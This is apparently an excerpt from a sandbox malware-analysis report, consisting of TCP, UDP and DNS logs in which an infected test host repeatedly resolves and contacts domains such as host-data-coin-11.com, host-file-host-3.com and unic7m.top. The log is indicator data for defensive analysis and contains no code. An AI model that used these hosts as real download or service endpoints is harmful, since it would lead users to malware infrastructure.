                                                                                                                                                                                Dec 1, 2021 10:04:28.563867092 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563884020 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563901901 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563918114 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563961029 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.564013958 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566214085 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566241026 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566257954 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566274881 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566293955 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566308975 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566327095 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566343069 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566359997 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566380024 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566385984 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566402912 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566410065 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566426039 CET804975595.213.165.249192.168.2.3

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Dec 1, 2021 10:04:25.959356070 CET5391053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:25.979190111 CET53539108.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.163358927 CET6402153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:26.182959080 CET53640218.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.369580984 CET6078453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:26.691288948 CET53607848.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:26.864141941 CET5114353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:26.883865118 CET53511438.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.051225901 CET5600953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:27.377582073 CET53560098.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.547131062 CET5902653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:27.877434969 CET53590268.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.053071976 CET4957253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:28.359352112 CET53495728.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:35.493311882 CET6082353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:35.513070107 CET53608238.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:35.710195065 CET5213053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:35.728220940 CET53521308.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:35.905901909 CET5510253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:35.925709963 CET53551028.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:36.097809076 CET5623653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET53562368.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:38.506958008 CET6329753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:38.530246019 CET53632978.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:38.701466084 CET5361553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:38.721179008 CET53536158.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:38.922229052 CET5072853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:38.942142963 CET53507288.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:39.125042915 CET5377753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:39.142980099 CET53537778.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:39.328583956 CET6035253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:39.348180056 CET53603528.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:39.516851902 CET5677353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:39.536752939 CET53567738.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:39.736749887 CET6098253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:39.756603956 CET53609828.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:39.933353901 CET5805853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:39.950864077 CET53580588.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:40.143012047 CET6436753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:40.162425995 CET53643678.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:40.329806089 CET5153953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:40.349658012 CET53515398.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:40.535372972 CET5058553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:40.823241949 CET53505858.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:43.352863073 CET5510853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:43.372376919 CET53551088.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:43.548263073 CET5894253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:43.567605019 CET53589428.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:43.744683027 CET6443253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:43.765840054 CET53644328.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:43.941843033 CET4925053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:43.961553097 CET53492508.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:44.159374952 CET6349053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:44.461524010 CET53634908.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:46.737521887 CET6112053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:46.757467985 CET53611208.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:46.929688931 CET5307953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:47.218033075 CET53530798.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:47.390554905 CET5082453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:47.410384893 CET53508248.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:47.583219051 CET5670653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:47.603219032 CET53567068.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:47.824915886 CET5356953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:47.842392921 CET53535698.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:51.176265001 CET6285553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:51.195394039 CET53628558.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:51.469307899 CET5104653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:51.489109993 CET53510468.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:51.728334904 CET6550153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:51.745596886 CET53655018.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:52.639209032 CET5346553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:52.658978939 CET53534658.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:52.964701891 CET4929053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:52.982064962 CET53492908.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:53.325989962 CET5975453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:53.345958948 CET53597548.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:53.544635057 CET4923453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:53.563703060 CET53492348.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:59.825092077 CET5872053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:04:59.842444897 CET53587208.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.039277077 CET5744753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.059180975 CET53574478.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.154787064 CET6358353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.240900040 CET6409953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.258542061 CET53640998.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.432288885 CET6461053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.442418098 CET53635838.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.451920033 CET53646108.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.628663063 CET5198953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.648046017 CET53519898.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.821759939 CET5315253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.143867016 CET53531528.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:01.369626999 CET6159053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.388787031 CET53615908.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:01.566164017 CET5607753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.583864927 CET53560778.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.517087936 CET5795153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.536447048 CET53579518.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.716141939 CET5327653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.735825062 CET53532768.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.926642895 CET6013553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.946532965 CET53601358.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.128762960 CET4984953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.148842096 CET53498498.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.336436033 CET6025353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.356832981 CET53602538.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.538578987 CET5870653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.561150074 CET53587068.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.770040035 CET6267753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.790406942 CET53626778.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.986479044 CET6259553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.006221056 CET53625958.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.186501026 CET5118953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.205960989 CET53511898.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.386497021 CET4996753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.405668020 CET53499678.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.621098995 CET5145453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.640774012 CET53514548.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:51.075542927 CET5636053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET53563608.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:00.314538956 CET4925853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:00.418350935 CET53492588.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:05.627151966 CET5619553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:05.667037964 CET53561958.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:06.656199932 CET5302153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:06.675901890 CET53530218.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:12.151945114 CET5261853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:12.252938032 CET53526188.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:15.523608923 CET5163353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:15.543258905 CET53516338.8.8.8192.168.2.3

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                Dec 1, 2021 10:04:25.959356070 CET192.168.2.38.8.8.80x7b71Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.163358927 CET192.168.2.38.8.8.80x2287Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.369580984 CET192.168.2.38.8.8.80x8941Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.864141941 CET192.168.2.38.8.8.80x4870Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:27.051225901 CET192.168.2.38.8.8.80xc084Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:27.547131062 CET192.168.2.38.8.8.80x2f08Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:28.053071976 CET192.168.2.38.8.8.80x2717Standard query (0)host-file-host-3.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.493311882 CET192.168.2.38.8.8.80x63caStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.710195065 CET192.168.2.38.8.8.80x1b12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.905901909 CET192.168.2.38.8.8.80xb7fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.097809076 CET192.168.2.38.8.8.80xcdc7Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.506958008 CET192.168.2.38.8.8.80xf1ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.701466084 CET192.168.2.38.8.8.80x1f0dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.922229052 CET192.168.2.38.8.8.80x4f0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.125042915 CET192.168.2.38.8.8.80x93d9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.328583956 CET192.168.2.38.8.8.80x2b11Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.516851902 CET192.168.2.38.8.8.80x7378Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.736749887 CET192.168.2.38.8.8.80x90faStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.933353901 CET192.168.2.38.8.8.80x39f4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:40.143012047 CET192.168.2.38.8.8.80x8b08Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:40.329806089 CET192.168.2.38.8.8.80x51abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:40.535372972 CET192.168.2.38.8.8.80x10baStandard query (0)host-file-host-3.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.352863073 CET192.168.2.38.8.8.80x5d03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.548263073 CET192.168.2.38.8.8.80xf2a2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.744683027 CET192.168.2.38.8.8.80x4945Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.941843033 CET192.168.2.38.8.8.80x33edStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:44.159374952 CET192.168.2.38.8.8.80x8d35Standard query (0)host-file-host-3.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:46.737521887 CET192.168.2.38.8.8.80x533eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:46.929688931 CET192.168.2.38.8.8.80xd273Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.390554905 CET192.168.2.38.8.8.80xb33cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.583219051 CET192.168.2.38.8.8.80x7bccStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.824915886 CET192.168.2.38.8.8.80xc219Standard query (0)privacytoolzforyou-7000.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.176265001 CET192.168.2.38.8.8.80xb8adStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.469307899 CET192.168.2.38.8.8.80x7124Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.728334904 CET192.168.2.38.8.8.80x3cb3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:52.639209032 CET192.168.2.38.8.8.80xf436Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:52.964701891 CET192.168.2.38.8.8.80xd5aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:53.325989962 CET192.168.2.38.8.8.80xf945Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:53.544635057 CET192.168.2.38.8.8.80xc7b1Standard query (0)host-file-host-3.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:59.825092077 CET192.168.2.38.8.8.80x66e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.039277077 CET192.168.2.38.8.8.80x8f32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.154787064 CET192.168.2.38.8.8.80xf211Standard query (0)file-file-host4.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.240900040 CET192.168.2.38.8.8.80x60d0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.432288885 CET192.168.2.38.8.8.80x9f03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.628663063 CET192.168.2.38.8.8.80x1c3fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.821759939 CET192.168.2.38.8.8.80x2c42Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:01.369626999 CET192.168.2.38.8.8.80x9ae6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:01.566164017 CET192.168.2.38.8.8.80xf3d8Standard query (0)host-file-host-3.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.517087936 CET192.168.2.38.8.8.80xed4eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.716141939 CET192.168.2.38.8.8.80xa9e8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.926642895 CET192.168.2.38.8.8.80xe10aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.128762960 CET192.168.2.38.8.8.80x30c3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.336436033 CET192.168.2.38.8.8.80x2a02Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.538578987 CET192.168.2.38.8.8.80x6236Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.770040035 CET192.168.2.38.8.8.80xde2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.986479044 CET192.168.2.38.8.8.80xef5cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.186501026 CET192.168.2.38.8.8.80x6dbaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.386497021 CET192.168.2.38.8.8.80x6d22Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.621098995 CET192.168.2.38.8.8.80x6afbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.075542927 CET192.168.2.38.8.8.80x817dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:00.314538956 CET192.168.2.38.8.8.80xaf06Standard query (0)unic7m.topA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:05.627151966 CET192.168.2.38.8.8.80x91b3Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:06.656199932 CET192.168.2.38.8.8.80x469eStandard query (0)unic7m.topA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:12.151945114 CET192.168.2.38.8.8.80x9361Standard query (0)unic7m.topA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:15.523608923 CET192.168.2.38.8.8.80x3998Standard query (0)unic7m.topA (IP address)IN (0x0001)

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                Dec 1, 2021 10:04:25.979190111 CET8.8.8.8192.168.2.30x7b71No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.182959080 CET8.8.8.8192.168.2.30x2287No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.691288948 CET8.8.8.8192.168.2.30x8941No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:26.883865118 CET8.8.8.8192.168.2.30x4870No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:27.377582073 CET8.8.8.8192.168.2.30xc084No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:27.877434969 CET8.8.8.8192.168.2.30x2f08No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:28.359352112 CET8.8.8.8192.168.2.30x2717No error (0)host-file-host-3.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.513070107 CET8.8.8.8192.168.2.30x63caNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.728220940 CET8.8.8.8192.168.2.30x1b12No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:35.925709963 CET8.8.8.8192.168.2.30xb7fNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET8.8.8.8192.168.2.30xcdc7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET8.8.8.8192.168.2.30xcdc7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET8.8.8.8192.168.2.30xcdc7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET8.8.8.8192.168.2.30xcdc7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:36.119568110 CET8.8.8.8192.168.2.30xcdc7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.530246019 CET8.8.8.8192.168.2.30xf1ebNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.721179008 CET8.8.8.8192.168.2.30x1f0dNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:38.942142963 CET8.8.8.8192.168.2.30x4f0No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.142980099 CET8.8.8.8192.168.2.30x93d9No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.348180056 CET8.8.8.8192.168.2.30x2b11No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.536752939 CET8.8.8.8192.168.2.30x7378No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.756603956 CET8.8.8.8192.168.2.30x90faNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:39.950864077 CET8.8.8.8192.168.2.30x39f4No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
